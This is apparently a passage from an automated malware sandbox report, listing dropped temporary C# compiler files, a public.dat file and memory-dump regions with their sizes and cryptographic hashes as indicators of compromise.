
SHA1
25884c0ec50473dbd9b35d6306265510e9eaa57c

SHA256
791e1ce871c58ea10b3d241899e389ef95aa1491b6f8925f6a53e5d40cf749a5

SHA512
1acf7db88cf0f16b849f93149f9a9d54a3c79678d9d8effe242ea7eeb263af2a6bda5dfcb488adf5643e0593e094c55deb82749bc711f5a6c48223a871529386

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
7c022289600ad8415e0a36206f6b50e4

SHA1
6a4623df8f64d2053f9e5edceb2ffd7077b6034c

SHA256
149eb0f8cd6cdbfb8cf7f6a5b4ab56c78b8b5232ba48e5ec48217654c4313caa

SHA512
a72bb418c66f06830e8ed9aa28ce17bf00cd6fbdc927263f2c9fed414993b5f3b9d09a70619d42ed01f94c075bcd46834692aae8534ffe85a501d6bfd4f0fc7d

Download Submit
C:\Users\Public\public.dat
Filesize
869KB

MD5
31aeb43b981d4d6272193e321bb21333

SHA1
84a21d2eb2847bcb53442e0aa7ab3f90dd796a61

SHA256
903b02ff3ef690ea53103737a07c36a732bd81ab04f78d6f5eb61ac0fc6f98a6

SHA512
7efb4cfd865a59b51b46e7071e3b346808a41621e893e6867658827c628d77866737697084c9b7c2cef110942aa2ad21e932642ef5feadb379cf8e7257b4cc88

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC7178.tmp
Filesize
652B

MD5
6097be112ec97881c808860b929befaf

SHA1
57e4b6db93e2915a1f6caf3e7c64a4abc5ff4cda

SHA256
90400c3aa711039f8e80b08ee994a37801215d5187f285f354cbc7a7d9ae166b

SHA512
f8081647fa5f2206d39a13305c7f0d79f1ee131d74796b8901601f7f19c16949d25aef1151e6881c2114ee36cd18f7fb28fc58a982ed6870cae2f927160ff6c5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA229.tmp
Filesize
652B

MD5
8ccf7e30280fdb0ce9d666669f537371

SHA1
8c6c909659c468b392050d6b757389c77ac61023

SHA256
2750cebf7f2966cd35010673256f726e0b288eb2e58e63c4330e190ee64f51aa

SHA512
c296f51a8105d919cce1d04796a76aecaf98fc00edc24501f77ffe77f5dedc891521612b5a9dcf259b5d26f4ce595c86eac571ed5ebe47d2da6e3057f381913f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA257.tmp
Filesize
652B

MD5
84129947547d17f3b999964426c41950

SHA1
000c20009405f91af963e27cc1f11e3afe165d27

SHA256
dd96182bc08d5d7ab77c796d650642e99b419c7db112f4492d34945749ea371c

SHA512
008b6310c225462f019c31a5696fb36c545f3f6a46e1046d8f8b6000a5eaff1924174d86027ee574f517727514390ed08660a99487a1a8f072fdf885a4816390

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA2C5.tmp
Filesize
652B

MD5
6124e37f555b111f8f2f82cf88474417

SHA1
0c8adceef800bfd4da35d5ccb21925363f1711b3

SHA256
1eb5b4b7c0684074defe3ba5ec3d5f20281f467501c1d38d12b7b7d0be9b6b5a

SHA512
fd10733f0a1997287863b6153aea731e618650ef67c4f823ccc610ba308c96f572c4ca5cb0509c0641ce806de59711fe3619e2df3ef55dcd9db596e98ab1f0eb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCA39F.tmp
Filesize
652B

MD5
3bba6f074d8096681204dfa532f65dc7

SHA1
758a985d444a092b37fec9d26de58472ed3c1e40

SHA256
21c77de872488a4e6a1ba5b2611721cac734e2bcc3290f51b5bd2f59c002c332

SHA512
775da2f61f3a145cedae3a0edbfe2c65564c8add7074a4cb147f7e90f888a6b029ade326935b3307c4769da571cb4faf6315d3afafce02a301d2d5669e6d4f56

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\py4ddipt.0.cs
Filesize
334B

MD5
60a1152ec32b816b91530c7814deaacd

SHA1
68f979631b0485aaae41203c4b14f9ce710dbd6f

SHA256
e4ec47a88eab9b07792d97b02ce1724cb45118860e8156bdeb9f7268b0c258d2

SHA512
58de87e6877b5495a250b8af6117a29fd32ae169086f37ad640a2b8eac6500b62daf0340410094765984381025bcdde750bd250088d3e4840f7aa72e9459eb65

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\py4ddipt.cmdline
Filesize
309B

MD5
9183a9b1ad0c5f24561b52c2bbe2b8b2

SHA1
8535b661779fff9b55380d838a333ad39d194012

SHA256
38fb7de72904594f30ce5aa960605057e70a3b3f917cb935ac8c8f83174b8354

SHA512
882cdc2a0ce935b80315cfd5ba402773c20c31edf2655dd7ca3c062d12389d1a03afb860daca7b70e66473ec7fa43fb818fa9c550809dc8eeebc957d21b0ebeb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rukl6ztm.0.cs
Filesize
249B

MD5
69ecfeb3e9a8fb7890d114ec056ffd6d

SHA1
cba5334d2ffe24c60ef793a3f6a7f08067a913db

SHA256
0a913fd594ad2da3159400fc3d7d2cc50b34f8f31675ec5ac5a41d7e79e9fd58

SHA512
be7eb5a6a8bcc7f279aee00ad650aa872fc7fc08227eedeb9cc0a4273f0382b91306f60878728eaba3c79fa8c96066b144ecea897360a11be38996f04fdd99e1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rukl6ztm.cmdline
Filesize
309B

MD5
7f8048363e6ab486571ddd6f61039f7c

SHA1
b06f52688a21e8339443262ee7f2c1bfba5052c8

SHA256
719d9025570f8795ffde003f9f1b0630b503d7c9deb3f8e809b59865cb15d0a2

SHA512
ec7262563c06162f205c2e570a20d3a78aeddbb7ea5605fa10ef2e1771e2105b2c98534fa9388e490ea0b0ac13635325e2b2f6fc0eddc98a59ee6f9f52248e12

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ukph4mqo.0.cs
Filesize
272B

MD5
4de985ae7f625fc7a2ff3ace5a46e3c6

SHA1
935986466ba0b620860f36bf08f08721827771cb

SHA256
53d5aecb149a00bc9c4fac5feb8e5feddf5c83986c12d5fef1c3ddd104b09004

SHA512
067916a8d16d322d72901baf3a369be43c99780961ccd306c171bf7ded06e3a13cf69c7fa0cd26c7fa181d87fc0e870f86d274098854a56346ca9272c0b99393

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ukph4mqo.cmdline
Filesize
309B

MD5
515fcee799c18067c69f44d609969fd0

SHA1
ba1d3540aa9b11d00764fe7ab120cd3e4cff7e20

SHA256
74f98191206ceb415f3deb41f5347a19a58d678ad6853f15fdee12d4f0ee6c18

SHA512
c81087d72e6eb723243a2c6fc210ff044c656f303aa98cd1e4a54f816610cb7b97cc6fa3e132d776acdd34f342cc89fc96871a0b5cda0baf1e298d914c324e41

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xkecb7mp.0.cs
Filesize
259B

MD5
560e1b883a997afcfa3b73d8a5cddbc1

SHA1
2905f3f296ac3c7d6a020fb61f0819dbea2f1569

SHA256
e5231270257f1727ca127b669a7c21d46ced81cd5b46e89c48dd8304c1185bea

SHA512
041dd231b93708d4ad65580ea0fa7cff34a9a43ff8d3ae45b631a381e01dc286607aec05b1aade537818d068ca0b576cac613fde626d60eb2e4e6c3c0f525635

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xkecb7mp.cmdline
Filesize
309B

MD5
668d260f297370f295cc0122a7104c03

SHA1
34899b6a87b473a013a48231caf872c31f455594

SHA256
d44a08789f9254d625768d31afd5a5a1f1109269f40eeb6ce509b6bacd94b657

SHA512
396cb303f8c7d7ee398e555d828f9abc905601bf9af56d16e334fbe4d2bfc81536fdd5c4e5de6286113c337b14e1ee67fffa84e2c2aa3058f1f1a95cebae14ee

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xknanuo7.0.cs
Filesize
286B

MD5
b23df8158ffd79f95b9bddd18738270b

SHA1
79e81bb74bc53671aeabecae224f0f9fe0e3ed7f

SHA256
856bded4416dd1595613354334ad1d3e5c4922a86102786429bcdb0e7f798882

SHA512
e23822d5b9a32d7fc705b772ef43bcb336e201ec9c1d2507a530e8b1b383b0727c0b53b92e881a953527e7b2ffb485e24c1161834c9380d1bb7498eac7e4a67f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xknanuo7.cmdline
Filesize
309B

MD5
d2612c627fe2237e2f6d85b295501589

SHA1
3abd8d4ded76ffdd6d5a1d9ad4e840ed5f770782

SHA256
ce10a8f86cffc93662472e03b1b5b0a33b63acc2615282efd3dd6ea26c2fbc7f

SHA512
e1a9ff5fd362a4e537ae41e5a95f9adc1da046e5ec23b2c0536f9cbeaa85c4ae814d157c98f4adb87dfd27dd88c871dd19469360db9df72695660e296c14577f

Download Submit
memory/340-152-0x00000000003C0000-0x0000000000400000-memory.dmp

Filesize
256KB

Download
memory/1204-119-0x0000000002130000-0x0000000002170000-memory.dmp

Filesize
256KB

Download
memory/1532-136-0x0000000001D80000-0x0000000001DC0000-memory.dmp

Filesize
256KB

Download
memory/2496-76-0x00000000740F0000-0x000000007469B000-memory.dmp

Filesize
5.7MB

Download
memory/2496-165-0x000000000C060000-0x000000000C143000-memory.dmp

Filesize
908KB

Download
memory/2496-168-0x00000000020A0000-0x00000000020E0000-memory.dmp

Filesize
256KB

Download
memory/2496-167-0x00000000740F0000-0x000000007469B000-memory.dmp

Filesize
5.7MB

Download
memory/2496-166-0x000000000C060000-0x000000000C143000-memory.dmp

Filesize
908KB

Download
memory/2496-163-0x0000000006CB0000-0x0000000006D8A000-memory.dmp

Filesize
872KB

Download
memory/2496-77-0x00000000740F0000-0x000000007469B000-memory.dmp

Filesize
5.7MB

Download
memory/2496-78-0x00000000020A0000-0x00000000020E0000-memory.dmp

Filesize
256KB

Download
memory/2496-164-0x0000000006CB0000-0x0000000006D8A000-memory.dmp

Filesize
872KB

Download
memory/2684-41-0x00000000026B0000-0x00000000026F0000-memory.dmp

Filesize
256KB

Download
memory/2684-38-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download
memory/2684-69-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download
memory/2684-40-0x00000000026B0000-0x00000000026F0000-memory.dmp

Filesize
256KB

Download
memory/2684-39-0x0000000074090000-0x000000007463B000-memory.dmp

Filesize
5.7MB

Download
memory/2804-102-0x0000000002190000-0x00000000021D0000-memory.dmp

Filesize
256KB

Download
memory/2964-47-0x0000000001E50000-0x0000000001E90000-memory.dmp

Filesize
256KB

Download